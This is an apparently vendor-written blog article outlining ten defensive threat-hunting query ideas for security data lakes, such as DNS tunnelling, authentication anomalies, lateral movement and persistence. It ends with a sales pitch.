10 Essential Threat Hunting Queries Every Security Lake Should Run

Threat hunting today has evolved from a reactive exercise into a proactive discipline that can mean the difference between detecting an intrusion early and discovering a breach months after the fact. With security data lakes now centralising telemetry from across your entire estate, the challenge is no longer about having enough data but rather knowing which queries will surface the threats that matter.

At the heart of effective threat hunting lies the ability to ask the right questions of your data. Whether you are leveraging Amazon Security Lake, building your own data lake infrastructure, or working with normalised schemas like OCSF, certain queries consistently prove their value in detecting sophisticated threats. This article explores ten essential threat hunting queries that every security operations team should be running regularly against their security lake.

Why Query-Based Threat Hunting Matters

Before diving into specific queries, it is worth understanding why this approach is so powerful. Security data lakes aggregate vast quantities of telemetry from endpoints, networks, cloud services, and applications. This creates an opportunity to correlate events across traditionally siloed data sources, but only if you know what patterns to look for.

Effective queries serve multiple purposes. They establish baselines of normal behaviour, identify anomalies that warrant investigation, uncover indicators of compromise that might otherwise remain hidden, and provide evidence for incident response and forensics. The queries we outline here have been selected based on their proven ability to detect real-world attack techniques mapped to the MITRE ATT&CK framework.

1. Unusual Outbound DNS Queries

DNS remains a favourite vector for attackers to exfiltrate data or to establish command and control channels. This query identifies DNS requests to newly registered domains, domains with suspicious characteristics, or an unusual volume of requests from a single source.

Look for DNS queries to domains registered within the last 30 days, requests containing excessive subdomain lengths (often used in DNS tunnelling), or endpoints making significantly more DNS queries than their baseline. These patterns frequently indicate data exfiltration or malware beaconing.

2. Authentication Anomalies Across Multiple Sources

Credential compromise remains one of the most common initial access vectors. This query correlates authentication events from multiple sources, including on-premises Active Directory, cloud identity providers, and VPN concentrators, to identify suspicious patterns.

Focus on failed authentication attempts followed by successful logins from different geographic locations, authentications occurring outside normal business hours for specific users, or lateral movement patterns where credentials are being reused across multiple systems in rapid succession. The power of this query lies in its ability to correlate identity events across your entire estate.

3. Rare Process Executions

Attackers often use uncommon or living-off-the-land binaries (LOLBins) to evade detection. This query establishes a baseline of process executions across your endpoints and flags processes that are statistically rare.

Examine processes that have executed on fewer than one per cent of your endpoints, binaries running from unusual locations such as temp directories or user profiles, or legitimate system tools being invoked with suspicious command line arguments. This approach is particularly effective at catching fileless attacks and post-exploitation activities.

4. Privileged Account Activity Outside Normal Patterns

Administrator and service accounts represent high-value targets. This query tracks the behaviour of privileged accounts and alerts when they deviate from established patterns.

Monitor for privileged accounts accessing resources they have never touched before, service accounts authenticating interactively when they should only be used programmatically, or admin accounts performing actions outside their typical schedule. Many advanced persistent threat actors spend weeks studying normal operations before making their move, so baseline deviations are critical indicators.

5. Lateral Movement via Administrative Shares

Once inside a network, attackers often move laterally using Windows administrative shares. This query identifies suspicious SMB activity that could indicate lateral movement.

Look for accounts accessing admin shares across multiple systems within short timeframes, unusual source-destination pairs based on your network architecture, or file transfers over SMB that do not match typical administrative activities. When enriched with asset criticality data, this query becomes even more powerful at prioritising threats.

6. Cloud Resource Modifications

As organisations increasingly rely on cloud infrastructure, attackers target cloud resources for persistence and data access. This query monitors for unauthorised or suspicious changes to cloud configurations.

Track security group modifications that open new ingress rules, changes to IAM policies that grant excessive permissions, or the creation of new users or roles outside change management windows. Pay particular attention to modifications made from unusual geographic locations or by accounts that do not typically perform administrative actions.

7. Data Staging Activities

Before exfiltration, attackers often stage large quantities of data in staging directories. This query identifies unusual data aggregation patterns that could indicate preparation for theft.

Monitor for the creation of archive files (ZIP, RAR, 7z) outside normal backup schedules, unusual amounts of data being copied to external storage locations, or rapid access to numerous sensitive files by a single account. The key is understanding what normal data handling looks like in your organisation.

8. Suspicious PowerShell and Command Line Activity

PowerShell and other scripting languages are frequently weaponised by attackers for various post-exploitation activities. This query examines command line telemetry for indicators of malicious scripting.

Focus on obfuscated command lines using base64 encoding or unusual character patterns, scripts attempting to download content from the internet, or the invocation of methods commonly used in attack frameworks. When combined with process ancestry information, this query can map out entire attack chains.

9. Anomalous Network Traffic Patterns

Even with encrypted connections, traffic metadata can reveal malicious behaviour. This query analyses network flow data for patterns inconsistent with normal operations.

Identify unusual port combinations, connections to IP addresses with poor reputations or associated with threat intelligence feeds, or traffic volume spikes from endpoints that do not normally generate significant network activity. Beaconing patterns, where connections occur at regular intervals, are particularly indicative of command-and-control traffic.

10. Indicators of Persistence Mechanisms

Attackers establish persistence to maintain access even after system reboots. This query hunts for common persistence techniques.

You should ensure you examine new scheduled tasks or cron jobs, modifications to registry run keys or startup folders, or the creation of new services. Additionally, look for changes to authentication mechanisms such as the addition of SSH keys or modifications to PAM configurations. Persistence mechanisms often provide the best evidence of compromise, as they must survive reboots to be effective.

Implementing These Queries in Your Environment

The value of these queries lies not just in their individual capability, but in how they work together to provide comprehensive coverage of attack techniques. When implementing them, consider the following best practices.

Firstly, tune each query to your environment. Generic queries will generate excessive false positives, so invest time in understanding your baselines. Secondly, automate where possible. These queries should run continuously, with results feeding into your SOAR platform or alerting systems. Thirdly, enrich your data. Threat intelligence feeds, asset criticality information, and user context all make these queries more effective.

Finally, document your findings. When a query identifies a genuine threat, record the indicators and refine the query to catch variations of the same technique. Threat hunting is an iterative process that improves with each investigation.

Conclusion

Effective threat hunting requires both the right data and the right questions to ask of that data. Security data lakes provide unprecedented visibility into your security posture, but only if you actively interrogate that data with purposeful queries. The ten queries outlined here represent a solid foundation for any threat hunting programme, covering initial access, lateral movement, persistence, and exfiltration across both on-premises and cloud environments.

As threats evolve, so too must your queries. Treat these as starting points rather than static rules, continuously refining them based on emerging threats, changes in your environment, and lessons learned from each investigation. When implemented consistently and tuned appropriately, these queries will significantly enhance your organisation’s ability to detect and respond to advanced threats before they cause significant harm.

Ready to transform your cyber posture? Contact us today via  to discover how our intelligent data processing platform can reduce your costs whilst enhancing your security posture.